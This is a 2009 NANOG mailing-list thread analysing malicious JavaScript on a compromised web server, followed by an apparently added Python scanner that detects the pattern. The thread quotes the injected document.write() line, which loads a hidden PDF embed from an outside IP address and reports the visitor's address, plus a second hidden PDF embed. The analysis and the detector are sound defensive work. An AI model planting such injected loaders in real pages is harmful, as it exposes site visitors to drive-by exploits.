Malicious code just found on web server

Chris Mills securinate at gmail.com
Fri Apr 17 22:34:54 UTC 2009


You beat me to it.

-ChrisAM

On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson <fergdawgster at gmail.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson <fergdawgster at gmail.com>
> wrote:
>
>>
>> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate at gmail.com>
>> wrote:
>>
>>> I took a quick look at the code... formatted it in a pastebin here:
>>> http://pastebin.com/m7b50be54
>>>
>>> That JavaScript writes this to the page (URL obscured):
>>> document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
>>>
>>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>>
>>> Below the JavaScript, it grabs a PDF:
>>> <embed src="include/two.pdf" width="1" height="0"
>>> style="border:none"></embed>
>>>
>>> That PDF is on the site, I haven't looked at it yet though.
>>>
>>
>> Most likely a file that exploits a well-known vulnerability in Adobe
>> Reader, which in turn probably loads malware from yet another location.
>>
>> We've been seeing a lot of this lately.
>>
>
> Yes, definitely malicious:
>
> http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b
>
> - - ferg
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP Desktop 9.5.3 (Build 5003)
>
> wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w
> /K0hKsJiAz4RGu8VQkyP+js=
> =AzJq
> -----END PGP SIGNATURE-----
>
>
>
> --
> "Fergie", a.k.a. Paul Ferguson
>  Engineering Architecture for the Internet
>  fergdawgster(at)gmail.com
>  ferg's tech blog: http://fergdawg.blogspot.com/
>
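The injection quoted above (a `document.write()` that emits a zero-sized `<embed type="application/pdf">` pointing at another host, plus a second 1x0 `<embed>` loading a PDF from the site itself) is easy to hunt for across a compromised web root. The scanner below is an added example, not code posted in this thread: it extracts plugin tags both from `document.write("...")` string literals and from the page markup, and flags any that are invisible, declare or load a PDF, or point at a host other than the page's own. The sample HTML is constructed from the snippets in the thread with a placeholder host name.

```python
"""Scan HTML for the hidden-<embed> loader pattern described in the thread.

Added example, not code posted in the thread.  It flags <embed>, <object>
and <iframe> tags that are (a) injected through a document.write("...")
string literal, (b) sized so they are invisible (width or height of 0/1),
(c) declared as application/pdf or pointing at a .pdf, or (d) loaded from
a host other than the page's own.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample modelled on the snippets quoted in the thread.  The
# host name is a placeholder, not the one seen on the compromised server.
SAMPLE_HTML = r'''<html><body>
<script type="text/javascript">
document.write("<embed src=\"http://malware.example.invalid/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
</script>
<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
<embed src="media/player.swf" width="640" height="480" type="application/x-shockwave-flash"></embed>
</body></html>'''

# document.write("...") with a double-quoted JS string literal (handles \" inside).
DOC_WRITE_RE = re.compile(r'document\.write\(\s*"((?:[^"\\]|\\.)*)"\s*\)')
PLUGIN_TAGS = ("embed", "object", "iframe")


class PluginTagCollector(HTMLParser):
    """Collect attribute dicts of plugin-style tags from an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag in PLUGIN_TAGS:
            self.found.append({k: (v or "") for k, v in attrs})


def _tags_in(fragment):
    parser = PluginTagCollector()
    parser.feed(fragment)
    parser.close()
    return parser.found


def _js_unescape(literal):
    # Enough for the backslash-escaped quotes and slashes seen in injected code.
    return re.sub(r'\\(.)', r'\1', literal)


def _px(value):
    try:
        return int(value.strip().lower().rstrip("px"))
    except (AttributeError, ValueError):
        return None


def suspicious_reasons(attrs, page_host=None):
    """Return the reasons a plugin tag looks like an injected exploit loader."""
    reasons = []
    w, h = _px(attrs.get("width")), _px(attrs.get("height"))
    if (w is not None and w <= 1) or (h is not None and h <= 1):
        reasons.append("invisible (width/height <= 1px)")
    if attrs.get("type", "").lower() == "application/pdf":
        reasons.append("type=application/pdf")
    src = attrs.get("src") or attrs.get("data") or ""
    if src.split("?", 1)[0].lower().endswith(".pdf"):
        reasons.append("loads a .pdf")
    host = urlsplit(src).hostname
    if host and page_host and host.lower() != page_host.lower():
        reasons.append("external host %s" % host)
    return reasons


def scan(html, page_host=None):
    """Return one finding per suspicious plugin tag, document.write() ones first."""
    findings = []
    for m in DOC_WRITE_RE.finditer(html):
        for attrs in _tags_in(_js_unescape(m.group(1))):
            reasons = ["written via document.write()"] + suspicious_reasons(attrs, page_host)
            findings.append({"origin": "document.write", "src": attrs.get("src", ""), "reasons": reasons})
    for attrs in _tags_in(html):
        reasons = suspicious_reasons(attrs, page_host)
        if reasons:
            findings.append({"origin": "markup", "src": attrs.get("src", ""), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_HTML, page_host="victim.example"):
        print(f["origin"], f["src"], "; ".join(f["reasons"]))
```

Run it over every `.html`/`.php` file under the document root (passing the site's own host name as `page_host`) and the two injected embeds surface while the ordinary 640x480 Flash player does not. The `document.write()` extraction is deliberately naive: it only handles double-quoted literals, so obfuscated loaders (string concatenation, `unescape()`, `eval()`) still need the manual deobfuscation done in the pastebin above.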

More information about the NANOG mailing list